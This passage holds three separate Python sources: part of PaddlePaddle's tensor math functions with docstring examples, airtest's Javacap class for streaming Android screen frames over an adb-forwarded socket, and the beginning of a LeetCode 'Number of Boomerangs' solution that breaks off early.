# the axis is a int element
x = paddle.to_tensor([[0.2, 0.3, 0.5, 0.9],
[0.1, 0.2, 0.6, 0.7]])
out1 = paddle.prod(x)
# [0.0002268]
out2 = paddle.prod(x, -1)
# [0.027 0.0084]
out3 = paddle.prod(x, 0)
# [0.02 0.06 0.3 0.63]
out4 = paddle.prod(x, 0, keepdim=True)
# [[0.02 0.06 0.3 0.63]]
out5 = paddle.prod(x, 0, dtype='int64')
# [0 0 0 0]
# the axis is list
y = paddle.to_tensor([[[1.0, 2.0], [3.0, 4.0]],
[[5.0, 6.0], [7.0, 8.0]]])
out6 = paddle.prod(y, [0, 1])
# [105. 384.]
out7 = paddle.prod(y, (1, 2))
# [ 24. 1680.]
"""
if dtype is not None:
check_dtype(dtype, 'dtype', ['float32', 'float64', 'int32', 'int64'], 'prod')
if x.dtype != convert_np_dtype_to_dtype_(dtype):
x = layers.cast(x, dtype)
return layers.reduce_prod(input=x, dim=axis, keep_dim=keepdim, name=name)
def sign(x, name=None):
"""
    This OP returns the sign of every element in `x`: 1 for positive, -1 for negative and 0 for zero.
Args:
x(Tensor): The input tensor. The data type can be float16, float32 or float64.
name (str, optional): The default value is None. Normally there is no need for user to
set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor: The output sign tensor with identical shape and data type to the input :attr:`x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([3.0, 0.0, -2.0, 1.7], dtype='float32')
out = paddle.sign(x=x)
print(out) # [1.0, 0.0, -1.0, 1.0]
"""
if in_dygraph_mode():
return _C_ops.sign(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'sign')
helper = LayerHelper("sign", **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type='sign', inputs={'X': [x]}, outputs={'Out': [out]})
return out
def tanh(x, name=None):
r"""
Tanh Activation Operator.
.. math::
        out = \frac{e^{x} - e^{-x}}{e^{x} + e^{-x}}
Args:
x (Tensor): Input of Tanh operator, an N-D Tensor, with data type float32, float64 or float16.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Output of Tanh operator, a Tensor with same data type and shape as input.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-0.4, -0.2, 0.1, 0.3])
out = paddle.tanh(x)
print(out)
# [-0.37994896 -0.19737532 0.09966799 0.29131261]
"""
if in_dygraph_mode():
return _C_ops.tanh(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'tanh')
    check_type(x, 'x', Variable, 'tanh')
helper = LayerHelper('tanh', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='tanh', inputs={'X': x}, outputs={'Out': out})
return out
@inplace_apis_in_dygraph_only
def tanh_(x, name=None):
r"""
Inplace version of ``tanh`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_tanh`.
"""
return _C_ops.tanh_(x)
def increment(x, value=1.0, name=None):
"""
The OP is usually used for control flow to increment the data of :attr:`x` by an amount :attr:`value`.
Notice that the number of elements in :attr:`x` must be equal to 1.
Args:
x (Tensor): A tensor that must always contain only one element, its data type supports float32, float64, int32 and int64.
value(float, optional): The amount to increment the data of :attr:`x`. Default: 1.0.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor, the elementwise-incremented tensor with the same shape and data type as :attr:`x`.
Examples:
.. code-block:: python
import paddle
data = paddle.zeros(shape=[1], dtype='float32')
counter = paddle.increment(data)
# [1.]
"""
if in_dygraph_mode():
return _C_ops.increment(x, 'step', value)
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'increment')
helper = LayerHelper("increment", **locals())
helper.append_op(
type='increment',
inputs={'X': [x]},
outputs={'Out': [x]},
attrs={'step': float(value)})
return x
def all(x, axis=None, keepdim=False, name=None):
"""
    Computes the ``logical and`` of tensor elements over the given dimension.
Args:
x (Tensor): An N-D Tensor, the input data type should be `bool`.
        axis (int|list|tuple, optional): The dimensions along which the ``logical and`` is computed. If
            :attr:`None`, the ``logical and`` is computed over all elements of :attr:`x` and a
            Tensor with a single element is returned, otherwise it must be in the
            range :math:`[-rank(x), rank(x))`. If :math:`axis[i] < 0`,
            the dimension to reduce is :math:`rank + axis[i]`.
        keepdim (bool, optional): Whether to reserve the reduced dimension in the
            output Tensor. The result Tensor will have one fewer dimension
            than :attr:`x` unless :attr:`keepdim` is True. Default is False.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
        Tensor: Results of the ``logical and`` on the specified axis of input Tensor `x`; its data type is bool.
Raises:
ValueError: If the data type of `x` is not bool.
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
import numpy as np
# x is a bool Tensor with following elements:
# [[True, False]
# [True, True]]
x = paddle.assign(np.array([[1, 0], [1, 1]], dtype='int32'))
print(x)
x = paddle.cast(x, 'bool')
# out1 should be [False]
out1 = paddle.all(x) # [False]
print(out1)
# out2 should be [True, False]
out2 = paddle.all(x, axis=0) # [True, False]
print(out2)
            # keepdim=False, out3 should be [False, True], out.shape should be (2,)
            out3 = paddle.all(x, axis=-1) # [False, True]
            print(out3)
            # keepdim=True, out4 should be [[False], [True]], out.shape should be (2, 1)
            out4 = paddle.all(x, axis=1, keepdim=True)
            out4 = paddle.cast(out4, 'int32') # [[0], [1]]
print(out4)
"""
    if axis is not None and not isinstance(axis, (list, tuple)):
        axis = [axis]
    if not axis:
        reduce_all_flag = True
    else:
        reduce_all_flag = len(axis) == len(x.shape)
if in_dygraph_mode():
        axis = axis if axis is not None and axis != [] else [0]
return _C_ops.reduce_all(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag)
attrs = {
        'dim': axis if axis is not None and axis != [] and axis != () else [0],
'keep_dim': keepdim,
'reduce_all': reduce_all_flag
}
check_variable_and_dtype(x, 'x', ['bool'], 'all')
check_type(axis, 'axis', (int, list, tuple, type(None)), 'all')
helper = LayerHelper('all', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='reduce_all',
inputs={'X': x},
outputs={'Out': out},
attrs=attrs)
return out
def any(x, axis=None, keepdim=False, name=None):
"""
    Computes the ``logical or`` of tensor elements over the given dimension.
Args:
x (Tensor): An N-D Tensor, the input data type should be `bool`.
        axis (int|list|tuple, optional): The dimensions along which the ``logical or`` is computed. If
            :attr:`None`, the ``logical or`` is computed over all elements of :attr:`x` and a
            Tensor with a single element is returned, otherwise it must be in the
            range :math:`[-rank(x), rank(x))`. If :math:`axis[i] < 0`,
            the dimension to reduce is :math:`rank + axis[i]`.
        keepdim (bool, optional): Whether to reserve the reduced dimension in the
            output Tensor. The result Tensor will have one fewer dimension
            than :attr:`x` unless :attr:`keepdim` is True. Default is False.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
        Tensor: Results of the ``logical or`` on the specified axis of input Tensor `x`; its data type is bool.
Raises:
ValueError: If the data type of `x` is not bool.
TypeError: The type of :attr:`axis` must be int, list or tuple.
Examples:
.. code-block:: python
import paddle
import numpy as np
            # x is a bool Tensor with following elements:
            # [[True, False]
            #  [True, True]]
x = paddle.assign(np.array([[1, 0], [1, 1]], dtype='int32'))
print(x)
x = paddle.cast(x, 'bool')
# out1 should be [True]
out1 = paddle.any(x) # [True]
print(out1)
# out2 should be [True, True]
out2 = paddle.any(x, axis=0) # [True, True]
print(out2)
            # keepdim=False, out3 should be [True, True], out.shape should be (2,)
            out3 = paddle.any(x, axis=-1) # [True, True]
            print(out3)
            # keepdim=True, result should be [[True], [True]], out.shape should be (2, 1)
            out4 = paddle.any(x, axis=1, keepdim=True)
            out4 = paddle.cast(out4, 'int32') # [[1], [1]]
print(out4)
"""
    if axis is not None and not isinstance(axis, (list, tuple)):
        axis = [axis]
    if not axis:
        reduce_all_flag = True
    else:
        reduce_all_flag = len(axis) == len(x.shape)
if in_dygraph_mode():
        axis = axis if axis is not None and axis != [] else [0]
return _C_ops.reduce_any(x, 'dim', axis, 'keep_dim', keepdim,
'reduce_all', reduce_all_flag)
attrs = {
        'dim': axis if axis is not None and axis != [] and axis != () else [0],
'keep_dim': keepdim,
'reduce_all': reduce_all_flag
}
check_variable_and_dtype(x, 'x', ['bool'], 'any')
check_type(axis, 'axis', (int, list, tuple, type(None)), 'any')
helper = LayerHelper('any', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='reduce_any',
inputs={'X': x},
outputs={'Out': out},
attrs=attrs)
return out
def broadcast_shape(x_shape, y_shape):
"""
    The function returns the result shape of broadcasting two tensors of shapes x_shape and y_shape; please refer to :ref:`user_guide_broadcasting` for more details.
Args:
x_shape (list[int]|tuple[int]): A shape of tensor.
y_shape (list[int]|tuple[int]): A shape of tensor.
Returns:
list[int], the result shape.
Examples:
.. code-block:: python
import paddle
shape = paddle.broadcast_shape([2, 1, 3], [1, 3, 1])
# [2, 3, 3]
# shape = paddle.broadcast_shape([2, 1, 3], [3, 3, 1])
# ValueError (terminated with error message).
"""
return core.broadcast_shape(x_shape, y_shape)
def conj(x, name=None):
r"""
    This function computes the conjugate of the Tensor element-wise.
Args:
x (Tensor): The input tensor which hold the complex numbers.
Optional data types are: complex64, complex128, float32, float64, int32 or int64.
name (str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
        out (Tensor): The conjugate of the input. The shape and data type are the same as the input.
            If the elements of the tensor are of a real type such as float32, float64, int32 or int64, the output is the same as the input.
Examples:
.. code-block:: python
import paddle
            data = paddle.to_tensor([[1+1j, 2+2j, 3+3j], [4+4j, 5+5j, 6+6j]])
#Tensor(shape=[2, 3], dtype=complex64, place=CUDAPlace(0), stop_gradient=True,
# [[(1+1j), (2+2j), (3+3j)],
# [(4+4j), (5+5j), (6+6j)]])
            conj_data = paddle.conj(data)
#Tensor(shape=[2, 3], dtype=complex64, place=CUDAPlace(0), stop_gradient=True,
# [[(1-1j), (2-2j), (3-3j)],
# [(4-4j), (5-5j), (6-6j)]])
"""
if in_dygraph_mode():
return _C_ops.conj(x)
check_variable_and_dtype(x, "x", ['complex64', 'complex128', 'float32', 'float64', 'int32', 'int64'], 'conj')
helper = LayerHelper('conj', **locals())
out = helper.create_variable_for_type_inference(
dtype=helper.input_dtype())
helper.append_op(type='conj', inputs={'X': x}, outputs={'Out': [out]})
return out
def digamma(x, name=None):
r"""
Calculates the digamma of the given input tensor, element-wise.
.. math::
Out = \Psi(x) = \frac{ \Gamma^{'}(x) }{ \Gamma(x) }
Args:
x (Tensor): Input Tensor. Must be one of the following types: float32, float64.
name(str, optional): The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Tensor, the digamma of the input Tensor, the shape and data type is the same with input.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([[1, 1.5], [0, -2.2]], dtype='float32')
res = paddle.digamma(data)
print(res)
# Tensor(shape=[2, 2], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [[-0.57721591, 0.03648996],
# [ nan , 5.32286835]])
"""
if in_dygraph_mode():
return _C_ops.digamma(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'digamma')
helper = LayerHelper('digamma', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(type='digamma', inputs={'X': x}, outputs={'Out': out})
return out
def neg(x, name=None):
"""
    This function computes the negative of the Tensor element-wise.
Args:
x (Tensor): Input of neg operator, an N-D Tensor, with data type float32, float64, int8, int16, int32, or int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): The negative of input Tensor. The shape and data type are the same with input Tensor.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-0.4, -0.2, 0.1, 0.3])
out = paddle.neg(x)
print(out)
# [0.4 0.2 -0.1 -0.3]
"""
return layers.scale(x, scale=-1.0, bias=0.0, bias_after_scale=True, act=None, name=name)
def atan2(x, y, name=None):
r"""
Element-wise arctangent of x/y with consideration of the quadrant.
Equation:
.. math::
atan2(x,y)=\left\{\begin{matrix}
& tan^{-1}(\frac{x}{y}) & y > 0 \\
& tan^{-1}(\frac{x}{y}) + \pi & x>=0, y < 0 \\
& tan^{-1}(\frac{x}{y}) - \pi & x<0, y < 0 \\
& +\frac{\pi}{2} & x>0, y = 0 \\
& -\frac{\pi}{2} & x<0, y = 0 \\
&\text{undefined} & x=0, y = 0
\end{matrix}\right.
Args:
x (Tensor): An N-D Tensor, the data type is int32, int64, float16, float32, float64.
y (Tensor): An N-D Tensor, must have the same type as `x`.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type are the same as the input (the output data type is float64 when the input data type is int).
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-1, +1, +1, -1]).astype('float32')
#Tensor(shape=[4], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [-1, 1, 1, -1])
y = paddle.to_tensor([-1, -1, +1, +1]).astype('float32')
#Tensor(shape=[4], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [-1, -1, 1, 1])
out = paddle.atan2(x, y)
#Tensor(shape=[4], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [-2.35619450, 2.35619450, 0.78539819, -0.78539819])
"""
if in_dygraph_mode():
return _C_ops.atan2(x, y)
else:
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float16', 'float32', 'float64'], 'atan2')
check_variable_and_dtype(y, 'y', ['int32', 'int64', 'float16', 'float32', 'float64'], 'atan2')
helper = LayerHelper('atan2', **locals())
inputs = {'X1' : x, 'X2' : y}
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='atan2', inputs=inputs, outputs={'Out': out})
return out
def lerp(x, y, weight, name=None):
r"""
Does a linear interpolation between x and y based on weight.
Equation:
.. math::
lerp(x, y, weight) = x + weight * (y - x).
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64.
y (Tensor): An N-D Tensor, the data type is float32, float64.
weight (float|Tensor): the weight for the interpolation formula.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type are the same as the input.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(1., 5., dtype='float32')
y = paddle.empty([4], dtype='float32')
y.fill_(10.)
out = paddle.lerp(x, y, 0.5)
# out: [5.5, 6., 6.5, 7.]
"""
if in_dygraph_mode():
check_type(weight, 'weight', (float, paddle.Tensor, Variable), 'lerp')
if isinstance(weight, float):
weight = paddle.to_tensor(weight, dtype=x.dtype)
return _C_ops.lerp(x, y, weight)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'lerp')
check_variable_and_dtype(y, 'y', ['float32', 'float64'], 'lerp')
check_variable_and_dtype(weight, 'weight', ['float32', 'float64'], 'lerp')
helper = LayerHelper('lerp', **locals())
inputs = {'X': x, 'Y': y, 'Weight': weight}
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(type='lerp', inputs=inputs, outputs={'Out': out})
return out
@inplace_apis_in_dygraph_only
def lerp_(x, y, weight, name=None):
r"""
Inplace version of ``lerp`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_lerp`.
"""
out_shape = broadcast_shape(x.shape, y.shape)
check_type(weight, 'weight', (float, paddle.Tensor, Variable), 'lerp')
if isinstance(weight, float):
weight = paddle.to_tensor([weight], dtype=x.dtype)
elif isinstance(weight, (paddle.Tensor, Variable)):
out_shape = broadcast_shape(out_shape, weight.shape)
if out_shape != x.shape:
raise ValueError("The shape of broadcast output {} is different from that of inplace tensor {} in the Inplace operation.".format(out_shape, x.shape))
return _C_ops.lerp_(x, y, weight)
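# Usage sketch for lerp_ (assumed dygraph-only usage, mirroring the lerp example above):
#   x = paddle.arange(1., 5., dtype='float32')
#   y = paddle.full([4], 10., dtype='float32')
#   x.lerp_(y, 0.5)  # x is updated in place to [5.5, 6.0, 6.5, 7.0]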
def rad2deg(x, name=None):
"""
Convert each of the elements of input x from angles in radians to degrees.
Equation:
.. math::
rad2deg(x) = \frac{180}{\pi} \cdot x
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type are the same as the input (the output data type is float32 when the input data type is int).
Examples:
.. code-block:: python
import paddle
import numpy as np
x1 = paddle.to_tensor([3.142, -3.142, 6.283, -6.283, 1.570, -1.570])
result1 = paddle.rad2deg(x1)
print(result1)
# Tensor(shape=[6], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [180.02334595, -180.02334595, 359.98937988, -359.98937988,
# 89.95437622 , -89.95437622])
x2 = paddle.to_tensor(np.pi/2)
result2 = paddle.rad2deg(x2)
print(result2)
# Tensor(shape=[1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [90.])
x3 = paddle.to_tensor(1)
result3 = paddle.rad2deg(x3)
print(result3)
# Tensor(shape=[1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [57.29578018])
"""
rad2deg_scale = 180 / np.pi
if in_dygraph_mode():
if convert_dtype(x.dtype) in ['int32', 'int64']:
x = cast(x, dtype="float32")
return _C_ops.scale(x, 'scale', rad2deg_scale)
else:
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float32', 'float64'], 'rad2deg')
helper = LayerHelper('rad2deg', **locals())
out_cast = x
if convert_dtype(x.dtype) in ['int32', 'int64']:
out_cast = helper.create_variable_for_type_inference(dtype=paddle.float32)
helper.append_op(
type='cast', inputs={'X':x}, outputs={'Out': out_cast}, attrs={'in_dtype': x.dtype,'out_dtype': paddle.float32})
out = helper.create_variable_for_type_inference(dtype=out_cast.dtype)
helper.append_op(
type='scale', inputs={'X':out_cast}, outputs={'Out': out}, attrs={'scale': rad2deg_scale})
return out
def deg2rad(x, name=None):
"""
Convert each of the elements of input x from degrees to angles in radians.
Equation:
.. math::
deg2rad(x) = \frac{\pi}{180} \cdot x
Args:
x (Tensor): An N-D Tensor, the data type is float32, float64, int32, int64.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor, the shape and data type are the same as the input (the output data type is float32 when the input data type is int).
Examples:
.. code-block:: python
import paddle
import numpy as np
x1 = paddle.to_tensor([180.0, -180.0, 360.0, -360.0, 90.0, -90.0])
result1 = paddle.deg2rad(x1)
print(result1)
# Tensor(shape=[6], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [3.14159274, -3.14159274, 6.28318548, -6.28318548, 1.57079637,
# -1.57079637])
x2 = paddle.to_tensor(180)
result2 = paddle.deg2rad(x2)
print(result2)
# Tensor(shape=[1], dtype=float32, place=CUDAPlace(0), stop_gradient=True,
# [3.14159274])
"""
deg2rad_scale = np.pi / 180.0
if in_dygraph_mode():
if convert_dtype(x.dtype) in ['int32', 'int64']:
x = cast(x, dtype="float32")
return _C_ops.scale(x, 'scale', deg2rad_scale)
else:
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float32', 'float64'], 'deg2rad')
helper = LayerHelper('deg2rad', **locals())
out_cast = x
if convert_dtype(x.dtype) in ['int32', 'int64']:
out_cast = helper.create_variable_for_type_inference(dtype=paddle.float32)
helper.append_op(
type='cast', inputs={'X':x}, outputs={'Out': out_cast}, attrs={'in_dtype': x.dtype,'out_dtype': paddle.float32})
out = helper.create_variable_for_type_inference(dtype=out_cast.dtype)
helper.append_op(
type='scale', inputs={'X':out_cast}, outputs={'Out': out}, attrs={'scale': deg2rad_scale})
return out
def diff(x, n=1, axis=-1, prepend=None, append=None, name=None):
r"""
Computes the n-th forward difference along the given axis.
The first-order differences are computed using the following formula:
.. math::
out[i] = x[i+1] - x[i]
Higher-order differences are computed by using paddle.diff() recursively.
Only n=1 is currently supported.
Args:
x(Tensor): The input tensor to compute the forward difference on.
n(int, optional): The number of times to recursively compute the difference.
Only n=1 is supported. Default: 1
axis(int, optional): The axis to compute the difference along. Default: -1
prepend(Tensor, optional): The tensor to prepend to input along axis before computing the difference.
Its dimension must be equivalent to that of x,
and its shape must match x's shape except on axis.
append(Tensor, optional): The tensor to append to input along axis before computing the difference.
Its dimension must be equivalent to that of x,
and its shape must match x's shape except on axis.
name(str|None): A name for this layer (optional). If set to None,
the layer will be named automatically.
Returns:
Tensor: The output tensor with same dtype with x.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([1, 4, 5, 2])
out = paddle.diff(x)
print(out)
# out:
# [3, 1, -3]
y = paddle.to_tensor([7, 9])
out = paddle.diff(x, append=y)
print(out)
# out:
# [3, 1, -3, 5, 2]
z = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
out = paddle.diff(z, axis=0)
print(out)
# out:
# [[3, 3, 3]]
out = paddle.diff(z, axis=1)
print(out)
# out:
# [[1, 1], [1, 1]]
"""
if axis < 0:
axis = axis + len(x.shape)
if axis > len(x.shape):
axis = len(x.shape)
if axis < 0:
axis = 0
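# after the normalization above, axis lies in the valid range [0, len(x.shape)]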
dtype = x.dtype
axes = [axis]
infer_flags = list(1 for i in range(len(axes)))
if in_dygraph_mode():
has_pend = False
input_list = []
if prepend is not None and append is not None:
input_list = [prepend, x, append]
has_pend = True
elif prepend is not None:
input_list = [prepend, x]
has_pend = True
elif append is not None:
input_list = [x, append]
has_pend = True
if has_pend:
new_input = _C_ops.concat(input_list, 'axis', axis)
else:
new_input = x
attrs_1 = ()
attrs_2 = ()
dim_len = new_input.shape[axis]
starts_1 = [0]
attrs_1 += ('starts', starts_1)
ends_1 = [dim_len - 1]
attrs_1 += ('ends', ends_1)
input_front = _C_ops.slice(new_input, None, None, 'axes', axes, \
'infer_flags', infer_flags, *attrs_1)
starts_2 = [1]
attrs_2 += ('starts', starts_2)
ends_2 = [dim_len]
attrs_2 += ('ends', ends_2)
input_back = _C_ops.slice(new_input, None, None, 'axes', axes, \
'infer_flags', infer_flags, *attrs_2)
if x.dtype == paddle.bool:
out = _C_ops.logical_xor(input_back, input_front)
else:
out = layers.elementwise_sub(input_back, input_front, axis=axis)
return out
else:
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'bool', 'int32', 'int64'], 'diff')
check_type(axis, 'axis', (int), 'diff')
helper = LayerHelper('diff', **locals())
has_pend = False
input_list = []
if prepend is not None and append is not None:
input_list = [prepend, x, append]
has_pend = True
elif prepend is not None:
input_list = [prepend, x]
has_pend = True
elif append is not None:
input_list = [x, append]
has_pend = True
if has_pend:
new_input = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='concat', inputs={'X': input_list}, outputs={'Out': [new_input]}, attrs={'axis': axis}
)
else:
new_input = x
dim_len = new_input.shape[axis]
attrs_1 = {'axes': axes}
starts_1 = [0]
ends_1 = [dim_len - 1]
attrs_1['starts'] = starts_1
attrs_1['ends'] = ends_1
input_front = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='slice', inputs={'Input': new_input}, attrs=attrs_1, outputs={'Out': input_front}
)
attrs_2 = {'axes': axes}
starts_2 = [1]
ends_2 = [dim_len]
attrs_2['starts'] = starts_2
attrs_2['ends'] = ends_2
input_back = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='slice', inputs={'Input': new_input}, attrs=attrs_2, outputs={'Out': input_back}
)
if dtype == paddle.bool:
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='logical_xor', inputs={"X": input_back, "Y": input_front}, outputs={"Out": out}
)
else:
out = layers.elementwise_sub(input_back, input_front, axis=axis)
return out
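# Worked example of the slice-and-subtract scheme used above (n=1, axis=-1):
#   x           = [1, 4, 5, 2]
#   input_front = x[:-1] = [1, 4, 5]
#   input_back  = x[1:]  = [4, 5, 2]
#   out = input_back - input_front = [3, 1, -3]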
def angle(x, name=None):
r"""
Element-wise angle of complex numbers. For non-negative real numbers, the angle is 0 while
for negative real numbers, the angle is :math:`\pi`.
Equation:
.. math::
angle(x)=arctan2(x.imag, x.real)
Args:
x (Tensor): An N-D Tensor, the data type is complex64, complex128, or float32, float64 .
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
out (Tensor): An N-D Tensor of real data type with the same precision as that of x's data type.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([-2, -1, 0, 1]).unsqueeze(-1).astype('float32')
y = paddle.to_tensor([-2, -1, 0, 1]).astype('float32')
z = x + 1j * y
print(z.numpy())
# [[-2.-2.j -2.-1.j -2.+0.j -2.+1.j]
# [-1.-2.j -1.-1.j -1.+0.j -1.+1.j]
# [ 0.-2.j 0.-1.j 0.+0.j 0.+1.j]
# [ 1.-2.j 1.-1.j 1.+0.j 1.+1.j]]
theta = paddle.angle(z)
print(theta.numpy())
# [[-2.3561945 -2.6779451 3.1415927 2.6779451]
# [-2.0344439 -2.3561945 3.1415927 2.3561945]
# [-1.5707964 -1.5707964 0. 1.5707964]
# [-1.1071488 -0.7853982 0. 0.7853982]]
"""
if in_dygraph_mode():
return _C_ops.angle(x)
check_variable_and_dtype(x, 'x',
['float32', 'float64', 'complex64', 'complex128'], 'angle')
op_type = "angle"
helper = LayerHelper(op_type, **locals())
inputs = {"X": x}
out = helper.create_variable_for_type_inference(
dtype=_complex_to_real_dtype(x.dtype))
outputs = {"Out": out}
helper.append_op(type=op_type, inputs=inputs, outputs=outputs)
return out
|
# -*- coding: utf-8 -*-
from airtest.utils.logger import get_logger
from airtest.utils.safesocket import SafeSocket
from airtest.utils.nbsp import NonBlockingStreamReader
from airtest.utils.snippet import on_method_ready, reg_cleanup
from airtest.core.android.yosemite import Yosemite
import struct
LOGGING = get_logger(__name__)
class Javacap(Yosemite):
"""
This is another screencap class. It is slower than minicap, but it provides better compatibility.
"""
APP_PKG = "com.netease.nie.yosemite"
SCREENCAP_SERVICE = "com.netease.nie.yosemite.Capture"
RECVTIMEOUT = None
def __init__(self, adb):
super(Javacap, self).__init__(adb)
self.frame_gen = None
@on_method_ready('install_or_upgrade')
def _setup_stream_server(self):
"""
Setup stream server
Returns:
adb shell process, non-blocking stream reader and local port
"""
localport, deviceport = self.adb.setup_forward("localabstract:javacap_{}".format(self.adb.serialno))
deviceport = deviceport[len("localabstract:"):]
# setup agent proc
apkpath = self.adb.path_app(self.APP_PKG)
cmds = ["CLASSPATH=" + apkpath, 'exec', 'app_process', '/system/bin', self.SCREENCAP_SERVICE,
"--scale", "100", "--socket", "%s" % deviceport, "-lazy", "2>&1"]
proc = self.adb.start_shell(cmds)
# check proc output
nbsp = NonBlockingStreamReader(proc.stdout, print_output=True, name="javacap_server")
while True:
line = nbsp.readline(timeout=5.0)
if line is None:
raise RuntimeError("javacap server setup timeout")
if b"Capture server listening on" in line:
break
if b"Address already in use" in line:
raise RuntimeError("javacap server setup error: %s" % line)
reg_cleanup(proc.kill)
return proc, nbsp, localport
def get_frames(self):
"""
Get the screen frames
Returns:
a generator that yields raw frame data
"""
proc, nbsp, localport = self._setup_stream_server()
s = SafeSocket()
s.connect((self.adb.host, localport))
t = s.recv(24)
# javacap header
LOGGING.debug(struct.unpack("<2B5I2B", t))
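# "<2B5I2B" decodes 2 uint8, 5 uint32 and 2 uint8 fields: 2 + 20 + 2 = 24 bytes, matching the recv(24) above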
stopping = False
while not stopping:
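# each iteration requests one frame: send b"1", then read a 4-byte little-endian length prefix followed by that many bytes of frame data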
s.send(b"1")
# recv frame header, count frame_size
if self.RECVTIMEOUT is not None:
header = s.recv_with_timeout(4, self.RECVTIMEOUT)
else:
header = s.recv(4)
if header is None:
LOGGING.error("javacap header is None")
# recv timeout, if not frame updated, maybe screen locked
stopping = yield None
else:
frame_size = struct.unpack("<I", header)[0]
frame_data = s.recv(frame_size)
stopping = yield frame_data
LOGGING.debug("javacap stream ends")
s.close()
nbsp.kill()
proc.kill()
self.adb.remove_forward("tcp:%s" % localport)
def get_frame_from_stream(self):
"""
Get frame from the stream
Returns:
frame
"""
if self.frame_gen is None:
self.frame_gen = self.get_frames()
return self.frame_gen.send(None)
def teardown_stream(self):
"""
End stream
Returns:
None
"""
if not self.frame_gen:
return
try:
self.frame_gen.send(1)
except (TypeError, StopIteration):
pass
else:
LOGGING.warning("%s tear down failed" % self.frame_gen)
self.frame_gen = None
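# Minimal usage sketch (assumed; requires a connected device and airtest's ADB wrapper):
#   from airtest.core.android.adb import ADB
#   cap = Javacap(ADB(serialno=None))
#   frame = cap.get_frame_from_stream()  # raw bytes of one screen frame
#   cap.teardown_stream()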
|
#
# @lc app=leetcode id=447 lang=python
#
# [447] Number of Boomerangs
#
# https://leetcode.com/problems/number-of-boomerangs/description/
#
# algorithms
# Easy (49.20%)
# Likes: 296
# Dislikes: 447
# Total Accepted: 54.7K
# Total Submissions: 109.6K
# Testcase Example: '[[0,0],[1,0],[2,0]]'
#
# Given n points in the plane that are all pairwise distinct, a "boomerang" is
# a tuple of points (i, j, k) such that the distance between i and j equals the
# distance between i and k (the order of the tuple matters).
#
# Find the number of boomerangs. You may assume that n will be at most 500 and
# coordinates of points are all in the range [-10000, 10000] (inclusive).
#
# Example:
#
#
# Input:
# [[0,0],[1,0],[2,0]]
#
# Output:
# 2
#
# Explanation:
# The two boomerangs are [[1,0],[0,0],[2,0]] and [[1,0],[2,0],[0,0]]
#
#
#
#
#
import math
class Solution(object):
def _numberOfBoomerangs(self, points):
"""
:type points: List[List[int]]
:rtype: int
"""
# Time Limit Exceeded approach (kept for reference)
result = []
